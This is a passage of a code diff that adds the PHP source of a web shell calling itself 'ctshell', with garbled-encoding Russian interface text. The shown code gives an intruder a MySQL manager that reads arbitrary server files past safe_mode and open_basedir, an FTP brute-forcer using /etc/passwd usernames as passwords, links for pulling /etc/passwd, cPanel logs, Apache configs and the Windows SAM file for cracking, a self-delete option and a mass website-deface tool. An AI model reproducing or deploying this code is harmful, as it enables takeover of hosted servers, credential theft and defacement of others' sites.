+else {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"> <font color=\"green\"> ".$letter." </font></a> ";}
+  }
+ }
+ if (!empty($letters)) {echo "<b>".$letters;}
+}
+?>
+</div> 
+</td><td width=1>
+<font size=2><a href="<? echo $sul; ?>act=about">About</a></font>
+</td></tr></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%"  borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
+<tr class=tr1><td>
+<center>
+<?
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+?>
+</center>
+</td></tr></table>
+<?php
+if ((!empty($donated_html)) and (in_array($act,$donated_act)))
+{
+ ?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="90%" valign="top"><?php echo $donated_html; ?></td></tr></table><br>
+<?php
+}
+?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $sul."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port){$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)  {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="90%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_error();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>Ìåíåäæåð SQL:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "ÍÅÒ ÑÂßÇÈ";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
+  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
+  $sqlquicklaunch[] = array("Server-status",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$sul."act=sql");
+ 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td  class=td2 width="48%" height="100" valign="top"><center><font size="5"> <br> </font></center>
+<li>Åñëè ëîãèí ÿâëÿåòñÿ ïóñòûì, ëîãèí - âëàäåëåö ïðîöåññà. </li>
+<li>Åñëè õîçÿèí ÿâëÿåòñÿ ïóñòûì, õîçÿèí - localhost </li>
+<li>Åñëè ïîðò ÿâëÿåòñÿ ïóñòûì, ïîðò - 3306 (íåïëàòåæ)</li></td>
+<td  class=td2 width="90%" height="1" valign="top">
+<TABLE height=1 class=table2 cellSpacing=0 cellPadding=0 width="1%" border=0><tr class=tr2>
+<td class=td2>&nbsp;<b><font size=2 color=#000000>Çàïîëíèòå ôîðìó:</font></b><table><tr class=tr2><td class=td2>Èìÿ:</td>
+<td  class=td2 align=right>Ïàðîëü:</td></tr><form><input type="hidden" name="act" value="sql"><tr>
+<td class=td2><input type="text" name="sql_login" value="root" maxlength="64"></td><td  class=td2 align=right>
+<input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr class=tr2><td class=td2>Õîñò:</td>
+<td class=td2>Ïîðò:</td></tr><tr><td class=td2><input type="text" name="sql_server" value="localhost" maxlength="64"></td>
+<td class=td2><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Ñîåäèíèòåñü"></td></tr><tr>
+<td class=td2></td></tr></form></table></td><?php }
+ else
+ {
+  if (!empty($sql_db))
+  {
+?><td width="25%" height="100%" valign="top"><a href="<?php echo $sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+$result = mysql_list_tables($sql_db);
+if (!$result) {echo mysql_error();}
+else
+{
+ echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+ $c = 0;
+ while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
+"; mysql_free_result($count); $c++;}
+ if (!$c) {echo "No tables found in database.";}
+}
+  }
+  else
+  {
+?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+$result = mysql_list_dbs($sql_sock);
+if (!$result) {echo mysql_error();}
+else
+{
+ ?><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+ echo "<option value=\"\">Databases (...)</option>
+";
+ $c = 0;
+ while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
+"; $c++;}
+}
+?></select><hr size="1" noshade>Ïîæàëóéñòà, âûáåðèòå áàçó äàííûõ<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  if ($sql_db)
+  {
+echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
+if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+echo "</b></center>";
+
+$acts = array("","dump");
+
+if ($sql_act == "query")
+{
+ echo "<hr size=\"1\" noshade>";
+ if ($submit)
+ {
+  if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
+}
+if (in_array($sql_act,$acts))
+{
+ ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+ if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+ if ($sql_act == "newtpl")
+ {
+  echo "<b>";
+  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+ }
+ else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+}
+elseif ($sql_act == "dump")
+{
+ $set = array();
+ $set["sock"] = $sql_sock;
+ $set["db"] = $sql_db;
+ $dump_out = "print";
+ if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
+ elseif ($dump_out == "download")
+ {
+  @ob_clean();
+  header("Content-type: ctshell");
+  header("Content-disposition: attachment; filename=\"".$f."\";"); 
+  $set["print"] = 1;
+  $set["nl2br"] = 1;
+ }
+ $set["file"] = $dump_file;
+ $set["add_drop"] = true;
+ $ret = mysql_dump($set);
+ if ($dump_out == "download") {exit;}
+}
+else
+{
+ $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
+ echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
+ echo "<tr>";
+ echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
+ echo "<td><center><b>Table</b></center></td>";
+ echo "<td><b>Rows</b></td>";
+ echo "<td><b>Type</b></td>";
+ echo "<td><b>Created</b></td>";
+ echo "<td><b>Modified</b></td>";
+ echo "<td><b>Size</b></td>";
+ echo "<td><b>Action</b></td>";
+ echo "</tr>";
+ $i = 0;
+ $tsize = $trows = 0;
+ while ($row = mysql_fetch_array($result, MYSQL_NUM))
+ {
+  $tsize += $row["5"];
+  $trows += $row["5"];
+  $size = view_size($row["5"]);
+  echo "<tr>";
+  echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
+  echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
+  echo "<td>".$row[3]."</td>";
+  echo "<td>".$row[1]."</td>";
+  echo "<td>".$row[10]."</td>";
+  echo "<td>".$row[11]."</td>";
+  echo "<td>".$size."</td>";
+  echo "<td>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
+<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
+</td>";
+  echo "</tr>";
+  $i++;
+ }
+ echo "<tr bgcolor=\"000000\">";
+ echo "<td><center><b>»</b></center></td>";
+ echo "<td><center><b>".$i." table(s)</b></center></td>";
+ echo "<td><b>".$trows."</b></td>";
+ echo "<td>".$row[1]."</td>";
+ echo "<td>".$row[10]."</td>";
+ echo "<td>".$row[11]."</td>";
+ echo "<td><b>".view_size($tsize)."</b></td>";
+ echo "<td></td>";
+ echo "</tr>";
+ echo "</table><hr size=\"1\" noshade><img src=\"".$sul."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
+<option>With selected:</option>
+<option value=\"drop\" >Drop</option>
+<option value=\"empty\" >Empty</option>
+<option value=\"chk\">Check table</option>
+<option value=\"Optimize table\">Optimize table</option>
+<option value=\"Repair table\">Repair table</option>
+<option value=\"Analyze table\">Analyze table</option>
+</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
+ mysql_free_result($result);
+}
+  }
+  }
+  else
+  {
+$acts = array("","newdb","serverstat","servervars","processes","getfile");
+if (in_array($sql_act,$acts))
+{
+ ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Ñîçäàéòå íîâûé Áàçó:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Ñîçäàòü"></form></td><td width="30%" height="1"><b>Ïðèñìîòðåòü Ôàéëà:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Âçÿòü"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+}
+if (!empty($sql_act))
+{
+ echo "<hr size=\"1\" noshade>";
+ if ($sql_act == "newdb")
+ {
+  echo "<b>";
+  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+  else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+ }
+ if ($sql_act == "serverstatus")
+ {
+  $result = mysql_query("SHOW STATUS", $sql_sock); 
+  echo "<center><b>Server-status variables:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+  echo "</table></center>";
+  mysql_free_result($result);
+ }
+ if ($sql_act == "servervars")
+ {
+  $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+  echo "<center><b>Server variables:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+  echo "</table>";
+  mysql_free_result($result);
+ }
+ if ($sql_act == "processes")
+ {
+  if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+  $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+  echo "<center><b>Ïðîöåññû:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+  echo "</table>";
+  mysql_free_result($result);
+ }
+ elseif (($sql_act == "getfile"))
+ {
+  if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
+  elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
+  elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
+  else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
+  else
+  {
+for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+$f = ""; 
+while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
+if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
+else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
+  }
+  mysql_free_result($result);
+  if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
+  }
+ }
+}
+  }
+ }
+ echo "</tr></table></table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
+ echo "<br><br>";
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if ($win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function ctftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+if ($fqb_onlywithsh)
+{
+ if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
+ else {$true = true;}
+}
+else {$true = true;}
+if ($true)
+{
+ $sock = @ftp_connect($host,$port,$timeout);
+ if (@ftp_login($sock,$login,$pass))
+ {
+  echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+  ob_flush();
+  return true;
+ }
+}
+  }
+  if (!empty($submit))
+  {
+if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+$fp = fopen("/etc/passwd","r");
+if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+else
+{
+ ob_flush();
+ $i = $success = 0;
+ $ftpquick_st = getmicrotime();
+ while(!feof($fp))
+ { 
+  $str = explode(":",fgets($fp,2048));
+  if (ctftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+  {
+$success++;
+  }
+  if ($i > $fqb_lenght) {break;}
+  $i++;
+ } 
+ if ($success == 0) {echo "No success. connections!";}
+ $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+ echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
+}
+  }
+  else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
+ }
+}
+if ($act == "lsa")
+{
+ echo "<center><b>Èíôîðìàöèÿ áåçîïàñíîñòè ñåðâåðà:</b></center>";
+ echo "<b>Ïðîãðàììíîå îáåñïå÷åíèå:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
+ echo "<b>Áåçîïàñíîñòü: ".$hsafemode."</b><br>";
+ echo "<b>Îòêðûòûé îñíîâíîé äèðåêòîð: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+if ($nixpasswd == 1) {$nixpasswd = 0;}
+$num = $nixpasswd + $nixpwdperpage;
+echo "<b>*nix /etc/passwd:</b><br>";
+$i = $nixpasswd;
+while ($i < $num)
+{
+ $uid = posix_getpwuid($i);
+ if ($uid) {echo join(":",$uid)."<br>";}
+ $i++;
+}
+  }
+  else {echo "<br><a href=\"".$sul."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=\"green\">Âû ìîæåòå âçëîìàòü winnt ïàðîëè. <a href=\"".$sul."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Ñêà÷àòü</b></u></a>, c èñïîëüçîâàíèå lcp.crack+.</font></b><br>";}
+ }
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else
+ {
+  echo "<b>File-System buffer</b><br><br>";
+  $ls_arr = $arr;
+  $disp_fullpath = true;
+  $act = "ls";
+ }
+}
+if ($act == "selfremove")
+{
+ if (!empty($submit))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ctshell v.".$cv."!"; exit; }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  $v = array();
+  for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$sul."\"><u><b>NO</b></u></a>";}
+  $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$sul."act=selfremove&submit=1';\"><u>YES</u></a>";
+  shuffle($v);
+  $v = join("&nbsp;&nbsp;&nbsp;",$v);
+  echo "<b>Ñàìîóäàëèòü: ".__FILE__." <br>Âû óâåðåííû?</b><center>".$v."</center>";
+ }
+}
+if ($act == "massdeface")
+{
+ if (empty($deface_in)) {$deface_in = $d;}
+ if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
+ if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+
+  $text = $deface_text;
+  $text_regexp = $deface_text_regexp;
+  if (empty($text)) {$text = " "; $text_regexp = 1;}
+
+  $a = array
+  (
+"name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
+"text"=>$text, "text_regexp"=>$text_regxp,
+"text_wwo"=>$deface_text_wwo,
+"text_cs"=>$deface_text_cs,
+"text_not"=>$deface_text_not
+  );
+  $defacetime = getmicrotime();
+  $in = array_unique(explode(";",$deface_in));
+  foreach($in as $v) {ctfsearch($v);}
+  $defacetime = round(getmicrotime()-$defacetime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+$ls_arr = $found;
+$disp_fullpath = true;
+$act = $dspact = "ls";
+  }
+ }
+ else
+ {
+  if (empty($deface_preview)) {$deface_preview = 1;}
+
+ }
+ echo "<form method=\"POST\">";
+ if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
+ echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
+<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
+<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
+<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
+<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
